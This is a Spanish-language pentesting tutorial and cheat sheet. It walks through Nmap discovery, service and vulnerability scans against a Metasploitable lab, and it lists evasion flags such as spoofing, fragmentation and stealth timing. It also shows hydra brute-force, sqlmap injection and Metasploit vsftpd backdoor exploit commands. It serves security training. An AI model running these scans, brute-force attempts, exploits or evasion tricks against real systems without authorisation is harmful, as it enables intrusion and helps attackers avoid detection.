Pentesting con Nmap: Guía Completa 2026

Metodología paso a paso, comandos prácticos y ejemplos para Metasploitable | Por Manuel Balbás

Guía completa de reconocimiento y explotación

Ethical Hacking Solo en entornos autorizados

¡ADVERTENCIA LEGAL!

Esta guía es solo para fines educativos y pruebas en entornos que poseas o tengas permiso explícito. El uso no autorizado de estas técnicas es ilegal.

Metodología de Pentesting

1

Reconocimiento

  • Descubrimiento de hosts
  • Fingerprinting
  • Enumeración de servicios
2

Análisis

  • Escaneo de vulnerabilidades
  • Scripts NSE
  • Análisis de servicios
3

Explotación

  • Herramientas externas
  • Metasploit Framework
  • Fuerza bruta
4

Post-Explotación

  • Mantenimiento de acceso
  • Limpieza de huellas
  • Reporte de hallazgos

Comandos Nmap por Fase

FASE 1 Reconocimiento y Enumeración

Descubrimiento de Hosts

nmap -sn 192.168.1.0/24

Escaneo rápido de red

nmap -sn -PE -PS22,443,80 192.168.1.0/24

Con detección de SO y nombre

nmap -Pn 192.168.1.0/24

Más sigiloso (sin ping)

Escaneo de Puertos

nmap -p- 192.168.1.144

Todos los puertos (lento)

nmap -sU -p 53,161,162,123 192.168.1.144

Escaneo UDP (DNS, SNMP)

nmap -p 22,80,443,8080,21,25,3306 192.168.1.144

Puertos específicos

nmap -p 1-1000 192.168.1.144

Rango de puertos

FASE 2 Análisis de Vulnerabilidades

Detección de Servicios

nmap -sV 192.168.1.144

Versión de servicios

nmap -sV --version-all 192.168.1.144

Versión agresiva (más intrusivo)

nmap -sC -sV 192.168.1.144

Servicios y versiones + scripts por defecto

Scripts NSE

nmap --script vuln 192.168.1.144

Buscar vulnerabilidades

nmap --script exploit 192.168.1.144

Scripts de exploits

nmap --script safe 192.168.1.144

Scripts de seguridad

nmap --script http-enum,http-vuln*,ssh-auth-methods 192.168.1.144

Scripts específicos

Detección de Sistema Operativo

nmap -O 192.168.1.144

Detección de OS

nmap -O --osscan-guess 192.168.1.144

OS con más agresividad

Scripts Específicos por Servicio

HTTP/Web
nmap --script http-enum,http-headers,http-methods,http-vuln* -p 80,443,8080 192.168.1.144
SSH
nmap --script ssh-auth-methods,sshv1,ssh2-enum-algos -p 22 192.168.1.144
SMB (Windows)
nmap --script smb-enum-shares,smb-vuln-ms17-010,smb-os-discovery -p 139,445 192.168.1.144
FTP
nmap --script ftp-anon,ftp-bounce,ftp-syst -p 21 192.168.1.144

FASE 3 Explotación (Herramientas externas)

Escaneo Agresivo

nmap -A -T4 192.168.1.144

Escaneo completo agresivo

nmap -sS -sV -sC -O -A -T4 -p- -oA full_scan 192.168.1.144

Escaneo completo con salida

Técnicas de Evasión

nmap -f 192.168.1.144

Fragmentación de paquetes

nmap -T0 192.168.1.144

Timing paranoico (sigiloso)

nmap -S 192.168.1.100 -e eth0 192.168.1.144

IP spoofing (evasión)

Comandos Específicos para Metasploitable

Metasploitable 2

Máquina vulnerable diseñada específicamente para prácticas de pentesting

Escaneo Básico

nmap -sV -sC -O 192.168.100.20

Buscar Vulnerabilidades

nmap --script vuln 192.168.100.20

Puertos Comunes en Metasploitable

nmap -p 21,22,23,25,53,80,111,139,445,512,513,514,1099,1524,2049,2121,3306,3632,5432,5900,6000,6667,8009,8180 192.168.100.20

FTP (Puerto 21)

nmap --script ftp-anon,ftp-brute,ftp-vuln* -p 21 192.168.100.20

SSH (Puerto 22)

nmap --script ssh-auth-methods,sshv1,ssh2-enum-algos -p 22 192.168.100.20

Samba (139,445)

nmap --script smb-enum-shares,smb-vuln-ms17-010,smb-os-discovery -p 139,445 192.168.100.20

Comandos Detallados para Metasploitable

Web (Puerto 80, 443, 8080)

nmap --script http-enum,http-vuln*,http-headers -p 80,443,8080 192.168.100.20

MySQL (Puerto 3306)

nmap --script mysql-enum,mysql-vuln-cve2012-2122 -p 3306 192.168.100.20

Cheatsheet Rápido de Nmap

Fase Comando Descripción
Descubrimiento nmap -sn 192.168.1.0/24 Hosts vivos
Puertos nmap -p- 192.168.1.144 Todos puertos
Servicios nmap -sV 192.168.1.144 Versiones
OS nmap -O 192.168.1.144 Sistema operativo
Vulnerabilidades nmap --script vuln 192.168.1.144 Buscar vulns
Completo nmap -A -T4 192.168.1.144 Todo en uno
Sigiloso nmap -T0 -f 192.168.1.144 Evasión
UDP nmap -sU -p 53,161 192.168.1.144 Escaneo UDP

Formatos de Salida

  • -oN Salida normal
  • -oX Salida XML
  • -oG Salida grepable
  • -oA Todos los formatos

Plantillas de Timing (-T)

  • 0 Paranoico (muy lento)
  • 1 Sigiloso (lento)
  • 3 Normal (predeterminado)
  • 4 Agresivo (rápido)
  • 5 Insano (muy rápido)

🚀 Metodología Completa Ejemplo

# 1. Reconocimiento
nmap -sn 192.168.100.0/24
# 2. Puertos y servicios
nmap -sS -sV -sC -O -p- -T4 -oA full_scan 192.168.100.20
# 3. Vulnerabilidades
nmap --script vuln,exploit -oA vuln_scan 192.168.100.20
# 4. Específico por servicio encontrado
nmap --script http-enum,http-vuln* -p 80,443 192.168.100.20
# 5. Fuerza bruta si hay login
hydra -l admin -P passwords.txt ssh://192.168.100.20

🔍 Para Analizar Resultados

# Ver puertos abiertos de un scan guardado
grep "open" full_scan.nmap
# Contar servicios
grep -c "open" full_scan.nmap
# Extraer URLs HTTP
grep -E "80/open|443/open|8080/open" full_scan.nmap

Herramientas Complementarias

Nikto

Escáner web de vulnerabilidades

nikto -h http://192.168.1.144

Dirb

Fuerza bruta directorios web

dirb http://192.168.1.144

SQLmap

Inyección SQL automática

sqlmap -u "http://192.168.1.144/vulnerable.php?id=1" --dbs

Hydra

Fuerza bruta credenciales

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.144

Metasploit

Framework de explotación

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.144
exploit

SNMP

Enumeración SNMP

nmap --script snmp-info,snmp-brute -sU -p 161 192.168.1.144

MySQL

Enumeración MySQL

nmap --script mysql-enum,mysql-vuln-cve2012-2122 -p 3306 192.168.1.144

Nmap Avanzado

Scripts personalizados NSE

nmap --script /ruta/mi_script.nse 192.168.1.144
nmap --script-updatedb

Metodología Completa de Pentesting

🎯 Metodología de Pentesting con Nmap

Esta guía presenta una metodología estructurada para realizar pruebas de penetración utilizando Nmap como herramienta principal de reconocimiento y enumeración.

FASE 1: RECONOCIMIENTO Y ENUMERACIÓN

Objetivo: Descubrir hosts vivos, puertos abiertos y servicios disponibles.

Descubrimiento de hosts vivos

nmap -sn 192.168.1.0/24

Escaneo de puertos

nmap -p- 192.168.1.144

FASE 2: ANÁLISIS DE VULNERABILIDADES

Objetivo: Identificar versiones de servicios, sistema operativo y vulnerabilidades conocidas.

Detección de servicios

nmap -sV 192.168.1.144

Scripts NSE

nmap --script vuln 192.168.1.144

FASE 3: EXPLOTACIÓN

Objetivo: Utilizar herramientas externas para explotar vulnerabilidades identificadas.

Herramientas complementarias

nikto -h http://192.168.1.144

Fuerza bruta

hydra -l admin -P passwords.txt ssh://192.168.1.144

FASE 4: COMANDOS AVANZADOS DE NMAP

Objetivo: Técnicas de evasión, timing y scripts personalizados.

Timing y evasión

nmap -T0 -f 192.168.1.144

Scripts personalizados

nmap --script /ruta/mi_script.nse 192.168.1.144

⚠️ IMPORTANTE:

  • Solo usa estos comandos en entornos que poseas o tengas permiso
  • Metasploitable es una máquina vulnerable diseñada para práctica
  • Guarda los resultados con -oA nombre para documentación
  • Usa -T0 o -T1 en redes monitoreadas para ser más sigiloso